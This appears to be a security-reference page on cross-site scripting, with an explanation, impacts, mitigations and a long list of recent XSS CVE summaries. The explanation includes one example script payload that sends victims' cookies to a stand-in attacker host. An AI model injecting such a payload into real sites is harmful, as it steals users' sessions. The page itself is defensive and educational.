Skip to main content

Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (38825)

EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting in ListingPro WordPress theme versions 2.9.11 and below allows authenticated subscriber-level users to inject malicious JavaScript that executes in the browsers of other users who view the affected page. The CVSS scope change (S:C) confirms the injected payload breaks out of the application's security boundary and runs in the victim's browser context, enabling session hijacking or unauthorized actions on behalf of higher-privileged users. No public exploit code or active exploitation has been identified at time of analysis.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored/reflected cross-site scripting in the WP Automatic WordPress plugin (versions before 3.135.1) lets unauthenticated remote attackers inject malicious script that executes in a victim's browser when they visit or interact with a crafted resource. The CVSS 3.1 score is 7.1 with a scope change (S:C), reflecting that injected script can affect components beyond the vulnerable plugin context. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/reflected Cross-Site Scripting in the Blog2Social WordPress plugin (versions 8.9.2 and earlier) lets unauthenticated remote attackers inject malicious JavaScript that executes in a victim's browser when they view an affected page. The CVSS 3.1 vector (AV:N/PR:N/UI:R) indicates no authentication is required but the victim must take an action such as visiting a crafted URL. There is no public exploit identified at time of analysis, no CISA KEV listing, and no EPSS score supplied with this report from Patchstack.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/reflected Cross-Site Scripting in the Customer Reviews for WooCommerce WordPress plugin (versions up to and including 5.110.1) lets unauthenticated attackers inject malicious script that executes in a victim's browser when they view the affected page. The CVSS:3.1 vector (AV:N/PR:N/UI:R, scope changed) indicates network-reachable, no-authentication exploitation that requires the victim to interact with attacker-controlled content. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; EPSS data was not provided.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Cross-site scripting in the Responsive Lightbox WordPress plugin (versions up to and including 2.7.6) lets unauthenticated remote attackers inject script that executes in a victim's browser when they interact with a crafted link or page. The CVSS 3.1 score of 7.1 reflects a scope-changing reflected/stored XSS (UI:R) that can run in the context of any visitor or logged-in administrator. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Cross-site scripting in the Gutenverse Form WordPress plugin (versions ≤ 2.4.7) lets unauthenticated remote attackers inject script that executes in a victim's browser when the victim interacts with a crafted link or page. The CVSS:3.1 score is 7.1 with a changed scope, reflecting that injected script crosses the trust boundary into the user's authenticated WordPress session. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Quick Interest Slider WordPress plugin (versions 3.1.6 and earlier) lets an unauthenticated attacker inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link or load a malicious page. The CVSS 3.1 base score is 7.1 with a scope change, reflecting that script execution crosses the plugin's security boundary into the broader WordPress session. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected/stored Cross-Site Scripting in the MapPress Maps for WordPress plugin (versions 2.97.3 and earlier) allows an unauthenticated remote attacker to inject malicious JavaScript that executes in the browser of a victim who interacts with a crafted link or page. Because the CVSS scope is changed (S:C), the injected script can act beyond the vulnerable component to affect logged-in users including administrators. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

WordPress XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting in the BNE Testimonials WordPress plugin (versions 2.0.8 and below) allows an authenticated Contributor-level user to inject persistent malicious scripts into testimonial entries. When a privileged user such as an administrator views the affected content, the injected script executes in their browser context, potentially enabling session hijacking, credential theft, or unauthorized administrative actions. No public exploit code or CISA KEV listing has been identified at time of analysis, but the scope-changed CVSS vector underscores that impact extends beyond the contributing user's own session.

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting in the Image Carousel WordPress plugin (versions <= 1.0.0.41) allows authenticated contributors to inject persistent malicious JavaScript into carousel elements. When a higher-privileged user such as an administrator views the affected content, the injected script executes in their browser context, enabling session hijacking or unauthorized administrative actions. No active exploitation or public exploit code has been identified at time of analysis, and the attack is bounded by the requirement for contributor-level access and victim interaction.

XSS
NVD
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated content injection in the Auros Core WordPress plugin (versions 5.3.1 and earlier) permits remote attackers to inject script-related HTML tags into rendered page output without any privileges or user interaction. The vulnerability is classified under CWE-80 (Basic XSS) and carries a CVSS 3.1 score of 5.3 (Medium), with impact limited to low confidentiality - consistent with an attacker reading page-context data rather than persistently compromising other users' sessions. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA Known Exploited Vulnerabilities catalog.

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting in the Exclusive Addons Elementor WordPress plugin (versions through 2.7.9.8) allows authenticated low-privileged users to inject persistent malicious scripts into Elementor widgets that execute in the browsers of site visitors and administrators. The scope change (S:C in the CVSS vector) indicates the injected payload escapes the attacker's context and affects other users, enabling session hijacking, credential theft, or privilege escalation to admin. No public exploit code or CISA KEV listing is identified at time of analysis, but Patchstack has disclosed the vulnerability publicly.

XSS Exclusive Addons Elementor
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Cross-site scripting in jupyter/nbconvert versions 7.17.0 and earlier allows any user with notebook write access to inject and execute arbitrary JavaScript in the browsers of users who view HTML-exported notebooks. The flaw stems from the `data_mermaid` rendering block in `share/templates/lab/base.html.j2`, which outputs `text/vnd.mermaid` cell content directly into HTML without escaping, enabling tag breakout from the enclosing `<pre>` element. No public exploit code has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog; however, the stored-XSS pattern means any user who views a maliciously crafted HTML export is at risk.

XSS Jupyter Jupyter Suse
NVD
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Server-side JavaScript execution and outbound HTTP request capabilities in Rapid7 InsightConnect Markdown Plugin versions 3.1.4 and earlier allow remote attackers to execute arbitrary scripts and make unauthorized HTTP requests through malicious content embedded in Markdown input to the markdown_to_pdf action. The PDF rendering engine lacks sufficient restrictions on script execution and network access. Patched version 4.0.0 is available from the vendor.

XSS SSRF Insightconnect Markdown Plugin
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected cross-site scripting in Revive Adserver's stats-video.php script allows remote attackers to inject arbitrary JavaScript into victim browsers by delivering a crafted URL. The Smarty template engine's custom `url` helper function emits attacker-controlled values without HTML encoding or sanitization, and the URL construction pattern for this endpoint exposes user input directly in rendered output. No active exploitation has been confirmed (not in CISA KEV), but the vulnerability is reachable without authentication and requires only victim interaction with a malicious link.

XSS PHP Adserver
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Reflected XSS in Revive Adserver 6.0.7 and earlier allows a low-privileged user to inject unsanitized JavaScript via the `refresh` parameter in the zone-include.php iFrame invocation script. The CVSS scope change (S:C) indicates that attacker-controlled script executes in the victim's browser security context, enabling session hijacking, credential theft, or malicious redirects against targeted users who click a crafted URL. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis, though the low attack complexity makes this straightforward for any attacker with XSS capability.

XSS PHP Adserver
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in Revive Adserver 6.0.7 allows an authenticated low-privilege attacker to inject persistent XSS payloads via entity names that render unescaped within the maintenance-acl-check.php and maintenance-banners-check.php tools. When an administrator later runs these maintenance utilities and inconsistencies are detected, the malicious payload executes in the admin's browser context, potentially enabling session hijacking or unauthorized administrative actions. No public exploit or active exploitation (CISA KEV) has been identified at time of analysis; the AC:H vector reflects that payload execution is partially outside attacker control, contingent on admin use of the specific maintenance tools.

XSS PHP Adserver
NVD
EPSS 0% CVSS 6.9
MEDIUM This Month

Stored XSS in Red Hat's Pen Drive report generator allows a cluster administrator to inject persistent JavaScript payloads into cluster objects such as ClusterVersion spec.channel, which then execute in the browser of any user who opens a generated HTML report. The flaw (CWE-79) stems from cluster-sourced data being rendered into HTML output without escaping or sanitization, crossing a security boundary (S:C) from infrastructure into end-user browser sessions. No public exploit or CISA KEV listing has been identified at time of analysis, but the C:H confidentiality impact indicates potential for session token or credential harvesting from report consumers.

XSS Pen Drive
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Scripting (XSS) vulnerability in the patron restriction type administration page of Koha Library Management System through 25.11 allows an authenticated remote attacker with administrator privileges to inject arbitrary web scripts via the restriction type label (display_text field)

XSS N A
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in Koha Library Management System's OPAC item detail page enables persistent script injection via the item public notes field (items.itemnotes), affecting all versions through 25.11. An authenticated attacker holding the edit_items permission can plant malicious JavaScript that executes in the browsers of any patron or staff member who subsequently views the affected item's detail page in the OPAC. No public exploit has been identified at time of analysis, and EPSS places exploitation probability at 0.21% (12th percentile), suggesting limited threat actor interest currently.

XSS N A
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

A stored cross-site scripting (XSS) vulnerability in the item type administration page of Koha Library Management System through 25.11 allows an authenticated remote attacker with administrator privileges to inject arbitrary web scripts via the item type check-in message field (checkinmsg)

XSS N A
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Grav before 1.6.30 contains a cross-site scripting vulnerability in the Admin plugin page editor default security configuration. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS RCE Grav
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Stored Cross-Site Scripting in Red Hat Build of Keycloak lets an authenticated administrator with `manage-client` permission (or access to client registration endpoints) register a malicious client whose redirect URI uses a case-insensitive `javascript:` or `data:` scheme, bypassing URI validation. When a victim later clicks a crafted link - for example during the logout flow or within the Admin Console - the script executes in the Keycloak origin, enabling session/token theft and effective code execution in that trusted context. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it carries a CVSS 7.3 (PR:L, UI:R).

XSS RCE Red Hat Build Of Keycloak
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Cross-site scripting in LibreChat's markdown artifact preview pipeline allows an authenticated attacker to inject arbitrary JavaScript into a victim's browser session via crafted image alt text. The marked library v15.0.12 fails to HTML-escape double-quote characters in image alt text when LibreChat's custom image renderer falls through to the built-in renderer, enabling attribute breakout via payloads like `" onload="payload`. The resulting unsanitized HTML is written directly to `innerHTML` inside the Sandpack preview iframe, executing attacker-controlled code in the victim's browser. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis; fixed in version 0.8.4-rc1.

XSS Librechat
NVD GitHub
EPSS 0% CVSS 3.4
LOW Monitor

Stored cross-site scripting in K2 extension for Joomla (versions 1.0-2.26) allows an authenticated Author-tier user to inject arbitrary JavaScript into the embedVideo POST field, which K2 stores verbatim and renders unescaped to every subsequent visitor of that article page. Any Joomla user granted K2 'create item' rights - the Author tier by default - can weaponize this to steal session cookies, redirect victims, or perform actions on behalf of any visitor including administrators. No public exploit code has been identified at time of analysis, and CISA SSVC classifies exploitation as none with partial technical impact.

XSS K2 Extension For Joomla
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

K2 ≤ 2.26 renders the `#__k2_users.image` column directly into HTML `src` attributes via two distinct templates, in both cases without HTML escaping.

XSS K2 Extension For Joomla
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Stored cross-site scripting in Pretix's PDF ticket and badge layout editor allows one backend user to inject JavaScript that executes in another backend user's browser when they open the PDF editor. Affected is the open-source Pretix event-ticketing platform on versions prior to the 2026.5.2 release; the malicious HTML embedded in a layout specification runs because the PDF editor page is one of the few backend pages that lacks a strong Content-Security-Policy. There is no public exploit identified at time of analysis, but the vendor has confirmed and patched the issue.

XSS Pretix
NVD VulDB
EPSS 0% CVSS 2.1
LOW PATCH Monitor

HTML injection on the pretix untrusted-redirect warning page enables phishing attacks against end users. Affecting the open-source event ticketing platform (all versions prior to 2026.5.2), authenticated low-privileged users can embed malicious HTML content into the redirect interstitial page that pretix displays before forwarding visitors to external URLs. The presence of a Content-Security-Policy on that page blocks script execution, so the primary attack surface is social engineering and credential phishing rather than full cross-site scripting. No public exploit code and no CISA KEV listing have been identified at time of analysis.

XSS Pretix
NVD
EPSS 0% CVSS 2.1
LOW PATCH Monitor

HTML injection into server-side PDF rendering contexts in Pretix enables low-privileged authenticated users to embed external image references that trigger outbound HTTP requests from the rendering engine, leaking the server's network identity and creating an SSRF vector against internal network services. The CVSS 4.0 score of 2.1 reflects genuinely low severity - exploitation requires authentication, specific content reaching PDF rendering paths, and passive user interaction to trigger PDF generation. No public exploit code exists and this vulnerability is absent from CISA KEV.

XSS SSRF Pretix
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

HTML injection on pretix's individual ticket confirmation page allows unsanitized email address content to execute arbitrary HTML - including scripts - in the browser of anyone who views that page. The injection point is the email address field submitted at order creation, which pretix stored and rendered without output encoding on the per-ticket confirmation view. Exploitation requires no authentication (PR:N in CVSS 4.0) but does require a victim to load the affected page (UI:P). No public exploit is identified and the vulnerability is not listed in CISA KEV; a vendor-released patch is available in version 2026.5.2.

XSS Pretix
NVD
EPSS 0% CVSS 2.1
LOW PATCH Monitor

HTML injection in the pretix-pages plugin for Pretix event ticketing software permits a high-privileged authenticated user to embed malicious HTML tags into plugin-rendered page content, which subsequently executes in the browsers of site visitors who view those pages. All tracked versions under cpe:2.3:a:pretix:pretix-pages are affected, with a vendor-released fix published 2026-06-25 in Pretix release 2026.5.2. No public exploit code or active exploitation has been identified at time of analysis.

XSS Pretix Pages
NVD
EPSS 0% CVSS 2.0
LOW PATCH Monitor

HTML injection in the pretix-digital Pretix ticketing plugin (CWE-80) allows high-privileged operators to embed malicious script-bearing HTML into event content that subsequently executes in the browsers of end users viewing rendered ticket or event pages. All versions of the plugin are indicated as affected per the CPE wildcard, with a vendor fix shipped in the 2026.5.2 release. No public exploit has been identified at time of analysis, the vulnerability is absent from the CISA KEV catalog, and the low CVSS 4.0 score of 2.0 reflects the high privilege and specific preconditions required for exploitation.

XSS Pretix Digital
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Cross-site scripting in the Forminator WordPress plugin (versions 1.53.1 and earlier, by WPMU DEV) lets unauthenticated remote attackers inject malicious script that executes in a victim's browser when they interact with crafted content. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C, score 7.1) confirms no authentication is required but that user interaction triggers the payload, and the changed scope means the injected script runs in a security context beyond the vulnerable component. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

XSS Forminator
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the TablePress WordPress plugin (versions 3.3.1 and earlier) lets an unauthenticated attacker inject script that executes in a victim's browser when they follow a crafted link. Because the CVSS scope is changed (S:C), successful exploitation can affect resources beyond the vulnerable component, including the WordPress admin session context. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported through Patchstack's WordPress vulnerability program.

XSS Tablepress
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/reflected Cross-Site Scripting in the Advanced Order Export For WooCommerce WordPress plugin (by AlgolPlus) affects all versions up to and including 4.0.9, letting a remote attacker inject script that executes in the browser of a victim who views attacker-controlled order/export data. The flaw carries a CVSS 7.1 rating driven by a scope change (attacker script runs outside the vulnerable component's security context) and requires victim interaction; there is no public exploit identified at time of analysis and it is not on the CISA KEV list.

WordPress XSS Advanced Order Export For Woocommerce
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored or reflected cross-site scripting in the Averta Master Slider WordPress plugin (versions 3.11.2 and earlier) lets unauthenticated remote attackers inject script that executes in a victim's browser, but only after the victim interacts with attacker-supplied content (UI:R). The CVSS:3.1 vector's scope change (S:C) reflects that injected code runs in the browser's trust context rather than the plugin's, enabling session theft or actions on behalf of the victim. There is no public exploit identified at time of analysis and the issue is not on CISA KEV.

XSS Master Slider
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the H5P WordPress plugin (versions 1.17.6 and earlier) lets an unauthenticated attacker inject script that executes in a victim's browser when they follow a crafted link, per the CVSS PR:N/UI:R vector. Because the scope is changed (S:C), successful execution can reach beyond the vulnerable component into the authenticated WordPress session context, enabling session/cookie theft or admin-context actions. There is no public exploit identified and the issue is not listed in CISA KEV, so risk is moderate (CVSS 7.1) and contingent on social-engineering a logged-in user.

XSS H5P
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/reflected Cross-Site Scripting in Melapress's WP Activity Log WordPress plugin (versions <= 5.6.3.1, reported by Patchstack) lets a low-privileged Subscriber-level user inject script that executes in another user's browser, with a CVSS-rated scope change (S:C) meaning the payload can affect resources beyond the plugin's own security context. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; direct impact is limited (C:L/I:L/A:L) but the cross-context scope and low attack complexity make it relevant for sites that allow open registration.

XSS Wp Activity Log
NVD
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Stored cross-site scripting in the Email Address Encoder WordPress plugin (free, before 1.0.25) and its Email Encoder Premium counterpart (before 0.3.12) lets unauthenticated visitors inject persistent JavaScript through the plugin's flawed email-replacement handling. Publicly available exploit code exists (disclosed by WPScan) and a vendor patch is available, but it is not in CISA KEV, so there is no public exploit identified as actively used in the wild. Successful exploitation executes attacker script in the browser of any user who later renders the affected page, typically an authenticated administrator.

WordPress XSS Email Address Encoder +1
NVD WPScan VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting in GitLab CE/EE (18.10 through 18.11.5, 19.0 through 19.0.2, and 19.1.0) lets an unauthenticated attacker run arbitrary JavaScript in a victim's authenticated browser session by abusing improper path validation, but only under specific conditions and after a logged-in user interacts with attacker-controlled content. The CVSS 8.0 rating (scope-changed, high confidentiality and integrity impact) reflects that successful exploitation effectively hijacks the victim's GitLab session. No public exploit has been identified at time of analysis and the issue is not in CISA KEV, though a HackerOne report exists and GitLab shipped fixes in 18.11.6, 19.0.3, and 19.1.1.

XSS Gitlab
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting in GitLab Enterprise Edition (all versions from 16.4 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1) lets an authenticated user holding only developer-role permissions inject unsanitized input that executes as JavaScript in a victim's browser session. Because the script runs with scope change in the context of another (potentially higher-privileged) user, an attacker can hijack sessions, exfiltrate data, or act on the victim's behalf. The flaw was reported privately via HackerOne and patched by GitLab; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Gitlab
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Essential Blocks for WordPress (all versions through 6.1.4) allows authenticated Contributor-level users to permanently embed malicious JavaScript into pages via the `configurablePrefix` attribute of the Table of Contents block. The payload persists in the database and executes in every subsequent visitor's browser, enabling session hijacking, credential theft, or forced redirects at scale across the site's audience. No public exploit code or CISA KEV listing is present in the available intelligence, but Wordfence's disclosure paired with publicly accessible source-level Trac links substantially lowers the effort required to develop a working exploit.

WordPress XSS Gutenberg Essential Blocks Page Builder For Gutenberg Blocks Patterns
NVD VulDB
EPSS 1% CVSS 8.8
HIGH This Week

Authentication bypass via cross-site scripting in Quest NetVault Backup's addclient3 webpage allows remote attackers to inject arbitrary script that executes in a victim's authenticated session, bypassing access controls. Disclosed through Trend Micro's Zero Day Initiative (ZDI-26-369, formerly ZDI-CAN-27666), the flaw requires user interaction - the target must visit a malicious page or open a malicious file - and can be chained with other weaknesses to achieve code execution in the SYSTEM context. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, though the high CVSS of 8.8 reflects the serious downstream RCE potential.

Authentication Bypass XSS RCE +1
NVD
EPSS 1% CVSS 8.8
HIGH This Week

Authentication bypass via cross-site scripting in the Quest NetVault Backup viewclient web interface lets remote attackers inject arbitrary script that, when a victim visits a malicious page or opens a malicious file, runs in the application context and circumvents authentication. Disclosed through Trend Micro's Zero Day Initiative (ZDI-26-377, ZDI-CAN-28202), the flaw can be chained with additional vulnerabilities to achieve code execution as SYSTEM. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CVSS 8.8 rating reflects the high impact of the auth-bypass-plus-RCE chain.

Authentication Bypass XSS RCE +1
NVD
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Stored cross-site scripting leading to OS command execution in SiYuan, an open-source personal knowledge management system, affects all desktop client versions prior to 3.7.0. Untrusted marketplace package metadata (name, version, author, description) is serialized via JSON.stringify() into a single-quoted data-obj HTML attribute without escaping single quotes or angle brackets, so a package name containing a single quote breaks out of the attribute and injects arbitrary HTML; because the Electron BrowserWindow runs with nodeIntegration:true and contextIsolation:false, the DOM XSS escalates to arbitrary command execution on the host. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-x88j-wgpr-h22x) notes this is the same root cause and impact as a prior advisory, reached through a sibling sink the earlier patch missed.

Command Injection XSS Siyuan
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Arbitrary command execution in the SiYuan Electron desktop client (versions prior to 3.7.0) allows a remote attacker to run OS commands on a victim's machine when they merely view a malicious Bazaar marketplace package's README. The root cause is that Lute's HTML sanitizer fails to strip <iframe> elements, which combine with the Electron client's permissive security settings (e.g. node integration / relaxed sandboxing) to escalate stored XSS into full code execution; notably no package installation is required, only viewing the package details. No public exploit has been identified at time of analysis, but the CVSS 4.0 score of 8.7 (High) reflects high confidentiality, integrity, and availability impact.

XSS Siyuan
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Stored cross-site scripting in SiYuan's Attribute View (database) asset cell renderer escalates to remote code execution on the Electron desktop client for all versions prior to 3.7.0. An attacker who can persist crafted content into a database asset cell has malicious JavaScript executed in the privileged Electron context, breaking out to the host operating system; the issue carries a 9.9 CVSS and is fixed in 3.7.0. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.

XSS RCE Siyuan
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

Stored cross-site scripting in SiYuan's attribute-view (database) cell renderer, affecting all versions prior to 3.7.0, lets a low-privileged attacker with write access to a synced workspace plant a persistent payload that runs arbitrary JavaScript when a victim opens the block-attribute panel. The genAVValueHTML function interpolates cell content raw in its text, url, phone, and mAsset branches and the Go kernel never escapes the value on input, so the malicious row survives sync byte-for-byte and fires on every device that renders it; on the Electron desktop client (nodeIntegration:true) the XSS escalates to host remote code execution via require('child_process'). CVSS is rated 9.9; there is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

XSS Siyuan
NVD GitHub
EPSS 0% CVSS 7.1
HIGH POC PATCH This Week

Stored cross-site scripting in SiYuan personal knowledge management system before 3.7.0 allows a third-party Bazaar package author to execute JavaScript in an Administrator's authenticated workspace origin. The lute sanitizer used by renderPackageREADME relies on a stale event-handler blocklist that omits modern DOM event attributes (onpointerover, onpointerdown, onauxclick, onbeforetoggle, onfocusin, onanimationstart, ontransitionend), and the rendered README HTML is injected via innerHTML with no client-side DOMPurify and no CSP/X-Frame-Options/X-Content-Type-Options headers. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but successful exploitation yields full control of the victim's workspace.

XSS Siyuan
NVD GitHub
EPSS 1% CVSS 9.2
CRITICAL POC PATCH Act Now

Origin-validation bypass in SiYuan Note (open-source personal knowledge management) before 3.7.0 lets any installed Chrome/Chromium browser extension obtain RoleAdministrator access to the local kernel HTTP server at 127.0.0.1:6806. Because the kernel unconditionally trusts all chrome-extension:// origins and desktop installs ship with an empty AccessAuthCode by default, a malicious or supply-chain-compromised extension can issue fully authenticated admin API calls with no further authentication, enabling data exfiltration, stored XSS injection, and configuration tampering. Publicly available exploit code exists; there is no public exploit identified as actively exploited.

XSS Google Siyuan
NVD GitHub
EPSS 0% CVSS 4.4
MEDIUM PATCH This Month

Stored XSS in Rocket.Chat's Gazzodown Markdown renderer allows authenticated users to inject javascript: protocol URIs into image elements that execute arbitrary JavaScript in a victim's browser session upon click. The ImageElement component in versions prior to 8.5.0 omits the sanitizeUrl() guard applied by the analogous LinkSpan component, creating an inconsistency that bypasses javascript:, data:, and vbscript: protocol blocking. No public exploit has been identified at time of analysis; exploitation is constrained to legacy browsers and requires victim interaction, reflected in the official CVSS score of 4.4 Medium.

XSS
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

Stored cross-site scripting in SiYuan personal knowledge management before 3.7.0 lets an attacker with write access to a synced workspace plant a CSS snippet whose '</style>' sequence breaks out of the surrounding <style> tag when renderSnippet() interpolates it via insertAdjacentHTML, running arbitrary JavaScript in the renderer. On Electron desktop builds the renderer runs with nodeIntegration:true, so the injected handler can reach require('child_process') and escalate the XSS to full host remote code execution. The payload syncs through the workspace repository and fires automatically on every device that pulls, and it bypasses the user's enabledJS=off setting; no public exploit or CISA KEV listing is identified at time of analysis.

XSS Siyuan
NVD GitHub
EPSS 0% CVSS 5.7
MEDIUM PATCH This Month

Stored XSS in Jellyfin's administrative dashboard allows a low-privileged user to execute arbitrary JavaScript in the browser context of a logged-in administrator. The `Client` header supplied during an `AuthenticateByName` API request is stored without sanitization and rendered unescaped when an administrator visits the Access tab of that user's profile in the dashboard. Affecting all versions prior to 10.11.9, successful exploitation could enable admin session hijacking, credential exfiltration, or unauthorized administrative actions; no public exploit or CISA KEV listing has been identified at time of analysis.

XSS Jellyfin
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting in Ghost CMS (versions 6.19.4 through 6.21.0) is enabled by the Admin API file upload endpoint accepting and preserving attacker-supplied Content-Type headers without server-side validation. When Ghost is configured with S3 or GCS storage backends that serve uploaded files from the same origin as the site, an authenticated attacker can upload a file with a crafted Content-Type (e.g., text/html) that causes browsers to execute it as HTML or JavaScript, enabling stored XSS against visitors and staff. No public exploit code has been identified at time of analysis, and the vulnerability is fixed in Ghost 6.21.1.

Node.js XSS File Upload +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-site scripting (JavaScript injection) in Ghost's ActivityPub client (@tryghost/activitypub) prior to version 3.1.0 allows a malicious federated server to embed attacker-controlled script in shared posts that executes in the browser of a victim Ghost user who views the content. The flaw stems from improper sanitization of post content received over ActivityPub federation, enabling session theft or actions performed in the victim's authenticated context. There is no public exploit identified at the time of analysis, and the issue is not listed in CISA KEV.

XSS Ghost
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

Stored XSS in Frappe Framework 17.0.0-dev allows authenticated low-privileged users to inject persistent malicious scripts via the frappe.ui.Tree component, which then execute in the browsers of other users who load the affected tree view. Reported by Fluid Attacks, this vulnerability carries a CVSS 4.0 score of 4.8 reflecting cross-user scope change impact despite limited direct system compromise. No confirmed active exploitation (not in CISA KEV) and no public exploit code has been identified at time of analysis.

XSS Frappe Framework
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM This Month

